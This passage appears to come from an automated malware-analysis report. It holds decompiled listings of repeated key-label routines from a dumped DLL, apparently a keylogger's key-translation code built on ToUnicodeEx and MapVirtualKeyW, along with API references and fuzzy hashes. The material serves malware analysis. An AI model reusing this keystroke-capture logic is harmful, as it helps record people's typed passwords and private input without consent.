                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Line addresses (collapsed from the side column): the append of the "[F8]" label is at 0x1000750e to 0x10007515; every following line lies in 0x100076f0 to 0x100078b6, the body shared by the neighbouring key-label routines.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F8]
                  • API String ID: 783433895-4160188810
                  • Opcode ID: 269bc51cce26e08b7987e5e807f60e6eca6bbb1954024bbcceed0e0ae58e0d67
                  • Instruction ID: f8e9f27ca4e45bd5c8ec38f2eac8d4937add76fc56490cf5c4d7db7a8d0d77db
                  • Opcode Fuzzy Hash: 269bc51cce26e08b7987e5e807f60e6eca6bbb1954024bbcceed0e0ae58e0d67
                  • Instruction Fuzzy Hash: 6031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000751F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F9]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Line addresses (collapsed from the side column): the append of the "[F9]" label is at 0x1000751f to 0x10007526; every following line lies in 0x100076f0 to 0x100078b6, the body shared by the neighbouring key-label routines.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F9]
                  • API String ID: 783433895-4008460491
                  • Opcode ID: 444f65efb271440691118d92cbb22e99e4c9ae094b7b34bc2ed2fe1424e09415
                  • Instruction ID: 38b91922dc69364cef5aea0e1c7caf2c8941d83122a4e84074c5e0a9e1d120e7
                  • Opcode Fuzzy Hash: 444f65efb271440691118d92cbb22e99e4c9ae094b7b34bc2ed2fe1424e09415
                  • Instruction Fuzzy Hash: 7931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007530(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Help]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Line addresses (collapsed from the side column): the append of the "[Help]" label is at 0x10007530 to 0x10007537; every following line lies in 0x100076f0 to 0x100078b6, the body shared by the neighbouring key-label routines.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Help]
                  • API String ID: 783433895-1051485797
                  • Opcode ID: ced4cd071d1595dfe819caa796369f839c5973703fb59967c5cdb73c5bd85563
                  • Instruction ID: f0b57f7016c57c8c20a1b9935e52d223e1421e2fc95fd17f59aa325daa1d6166
                  • Opcode Fuzzy Hash: ced4cd071d1595dfe819caa796369f839c5973703fb59967c5cdb73c5bd85563
                  • Instruction Fuzzy Hash: 6531C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007541(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Home]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses for the statements in the listing above, in listing order:
                  0x10007541, 0x10007541, 0x10007548, 0x100076f0, 0x100076f5, 0x10007727, 0x10007727, 0x10007731,
                  0x10007759, 0x1000775d, 0x1000780e, 0x10007810, 0x10007816, 0x1000781f, 0x10007836, 0x10007838,
                  0x10007839, 0x10007845, 0x1000784e, 0x10007853, 0x10007855, 0x10007857, 0x10007879, 0x10007880,
                  0x10007880, 0x10007857, 0x10007855, 0x10007763, 0x10007774, 0x10007776, 0x1000777b, 0x10007780,
                  0x1000778f, 0x10007794, 0x10007798, 0x100077be, 0x100077cb, 0x1000779a, 0x100077a2, 0x100077af,
                  0x100077af, 0x10007798, 0x100077d0, 0x100077d6, 0x100077d8, 0x100077f8, 0x100077f8, 0x10007807,
                  0x10007807, 0x1000788b, 0x10007890, 0x10007894, 0x10007894, 0x1000789b, 0x1000789e, 0x100078a1,
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Home]
                  • API String ID: 783433895-1734740514
                  • Opcode ID: 9ec5ab9d4604e29abd3d62d3fd543d6ce600cb0c2aac55af5353df70f8432c9f
                  • Instruction ID: 9b7988cd9c8808cb16b3aff513ce4990ca071120e42acbfc5b27312343c6384a
                  • Opcode Fuzzy Hash: 9ec5ab9d4604e29abd3d62d3fd543d6ce600cb0c2aac55af5353df70f8432c9f
                  • Instruction Fuzzy Hash: 5431B0B8B042545BF722C7658C45B9F73A9FB882C0F50C0A5B5489720ECA78EE45C761
                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007552(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Insert]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses for the statements in the listing above, in listing order:
                  0x10007552, 0x10007552, 0x10007559, 0x100076f0, 0x100076f5, 0x10007727, 0x10007727, 0x10007731,
                  0x10007759, 0x1000775d, 0x1000780e, 0x10007810, 0x10007816, 0x1000781f, 0x10007836, 0x10007838,
                  0x10007839, 0x10007845, 0x1000784e, 0x10007853, 0x10007855, 0x10007857, 0x10007879, 0x10007880,
                  0x10007880, 0x10007857, 0x10007855, 0x10007763, 0x10007774, 0x10007776, 0x1000777b, 0x10007780,
                  0x1000778f, 0x10007794, 0x10007798, 0x100077be, 0x100077cb, 0x1000779a, 0x100077a2, 0x100077af,
                  0x100077af, 0x10007798, 0x100077d0, 0x100077d6, 0x100077d8, 0x100077f8, 0x100077f8, 0x10007807,
                  0x10007807, 0x1000788b, 0x10007890, 0x10007894, 0x10007894, 0x1000789b, 0x1000789e, 0x100078a1,
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Insert]
                  • API String ID: 783433895-3655187251
                  • Opcode ID: 9d60750e0895b90f1793ccffef72419a008b73ac973bbf6264f6d5eda5d9540b
                  • Instruction ID: 57a58e9cbdcce06a745c8a6e1d46379205d73043c2f41df68cb32627f3cbbbdd
                  • Opcode Fuzzy Hash: 9d60750e0895b90f1793ccffef72419a008b73ac973bbf6264f6d5eda5d9540b
                  • Instruction Fuzzy Hash: 4831BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A6B5489720ECA78EE458B61
                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007563(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Mail]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses for the statements in the listing above, in listing order:
                  0x10007563, 0x10007563, 0x1000756a, 0x100076f0, 0x100076f5, 0x10007727, 0x10007727, 0x10007731,
                  0x10007759, 0x1000775d, 0x1000780e, 0x10007810, 0x10007816, 0x1000781f, 0x10007836, 0x10007838,
                  0x10007839, 0x10007845, 0x1000784e, 0x10007853, 0x10007855, 0x10007857, 0x10007879, 0x10007880,
                  0x10007880, 0x10007857, 0x10007855, 0x10007763, 0x10007774, 0x10007776, 0x1000777b, 0x10007780,
                  0x1000778f, 0x10007794, 0x10007798, 0x100077be, 0x100077cb, 0x1000779a, 0x100077a2, 0x100077af,
                  0x100077af, 0x10007798, 0x100077d0, 0x100077d6, 0x100077d8, 0x100077f8, 0x100077f8, 0x10007807,
                  0x10007807, 0x1000788b, 0x10007890, 0x10007894, 0x10007894, 0x1000789b, 0x1000789e, 0x100078a1,
                  0x100078b6

                  APIs
